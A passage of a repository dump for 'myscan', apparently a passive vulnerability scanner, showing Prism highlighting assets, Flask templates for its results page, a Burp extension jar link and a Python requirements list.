::selection,code[class*="language-"]::selection,code[class*="language-"] ::selection{text-shadow:none;background:#b3d4fc}@media print{code[class*="language-"],pre[class*="language-"]{text-shadow:none}}pre[class*="language-"]{padding:1em;margin:.5em 0;overflow:auto}:not(pre)>code[class*="language-"],pre[class*="language-"]{background:#f5f2f0}:not(pre)>code[class*="language-"]{padding:.1em;border-radius:.3em}.token.comment,.token.prolog,.token.doctype,.token.cdata{color:slategray}.token.punctuation{color:#999}.namespace{opacity:.7}.token.property,.token.tag,.token.boolean,.token.number,.token.constant,.token.symbol,.token.deleted{color:#905}.token.selector,.token.attr-name,.token.string,.token.char,.token.builtin,.token.inserted{color:#690}.token.operator,.token.entity,.token.url,.language-css .token.string,.style .token.string{color:#a67f59;background:hsla(0,0,100%,.5)}.token.atrule,.token.attr-value,.token.keyword{color:#07a}.token.function{color:#dd4a68}.token.regex,.token.important,.token.variable{color:#e90}.token.important,.token.bold{font-weight:bold}.token.italic{font-style:italic}.token.entity{cursor:help} -------------------------------------------------------------------------------- /myscan/web/static/js/prism-http.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.http={"request-line":{pattern:/^(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b\shttps?:\/\/\S+\sHTTP\/[0-9.]+/,inside:{property:/^\b(POST|GET|PUT|DELETE|OPTIONS|PATCH|TRACE|CONNECT)\b/,"attr-name":/:\w+/}},"response-status":{pattern:/^HTTP\/1.[01] [0-9]+.*/,inside:{property:/[0-9]+[A-Z\s-]+$/i}},keyword:/^[\w-]+:(?=.+)/m};var httpLanguages={"application/json":Prism.languages.javascript,"application/xml":Prism.languages.markup,"text/xml":Prism.languages.markup,"text/html":Prism.languages.markup};for(var contentType in httpLanguages)if(httpLanguages[contentType]){var options={};options[contentType]={pattern:new 
RegExp("(content-type:\\s*"+contentType+"[\\w\\W]*?)\\n\\n[\\w\\W]*","i"),lookbehind:!0,inside:{rest:httpLanguages[contentType]}},Prism.languages.insertBefore("http","keyword",options)} -------------------------------------------------------------------------------- /myscan/web/static/js/prism-javascript.min.js: -------------------------------------------------------------------------------- 1 | Prism.languages.javascript=Prism.languages.extend("clike",{keyword:/\b(break|case|catch|class|const|continue|debugger|default|delete|do|else|enum|export|extends|false|finally|for|function|get|if|implements|import|in|instanceof|interface|let|new|null|package|private|protected|public|return|set|static|super|switch|this|throw|true|try|typeof|var|void|while|with|yield)\b/,number:/\b-?(0x[\dA-Fa-f]+|\d*\.?\d+([Ee][+-]?\d+)?|NaN|-?Infinity)\b/,"function":/(?!\d)[a-z0-9_$]+(?=\()/i}),Prism.languages.insertBefore("javascript","keyword",{regex:{pattern:/(^|[^/])\/(?!\/)(\[.+?]|\\.|[^/\r\n])+\/[gim]{0,3}(?=\s*($|[\r\n,.;})]))/,lookbehind:!0}}),Prism.languages.markup&&Prism.languages.insertBefore("markup","tag",{script:{pattern:/[\w\W]*?<\/script>/i,inside:{tag:{pattern:/|<\/script>/i,inside:Prism.languages.markup.tag.inside},rest:Prism.languages.javascript},alias:"language-javascript"}}); -------------------------------------------------------------------------------- /myscan/web/templates/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | {{title}} 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 35 | 36 |
37 | {% block content %}{% endblock %} 38 | 39 |
40 |
41 | 46 |
47 |
48 | 49 | 50 | -------------------------------------------------------------------------------- /myscan/web/templates/error.html: -------------------------------------------------------------------------------- 1 | 2 |

3 | no result 4 |

5 | 6 | -------------------------------------------------------------------------------- /myscan/web/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "base.html" %} 2 | {% block content %} 3 | 4 |
5 |
6 |
7 |

Myscan被动扫描结果 漏洞总数:{{total_counts}}条

8 |
9 |
10 | 11 | 12 | 13 | 14 | 15 |
16 |
17 | 18 |
19 |
20 |
21 |
22 | 23 |
24 |
25 | 26 | {% endblock %} 27 | -------------------------------------------------------------------------------- /myscan_burp_extension.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/amcai/myscan/c0ed549669ec76cc9fea660554943244cbdd703b/myscan_burp_extension.jar -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pyjnius 2 | requests 3 | incremental 4 | requests-toolbelt 5 | redis 6 | flask 7 | six 8 | dnspython 9 | ldaptor 10 | pyCrypto 11 | pysmb 12 | pymongo 13 | python-nmap 14 | paramiko 15 | pymysql 16 | elasticsearch-dsl>=7.0.0,<8.0.0 17 | elasticsearch 18 | mmh3 19 | cryptography 20 | bs4 21 | pyDes --------------------------------------------------------------------------------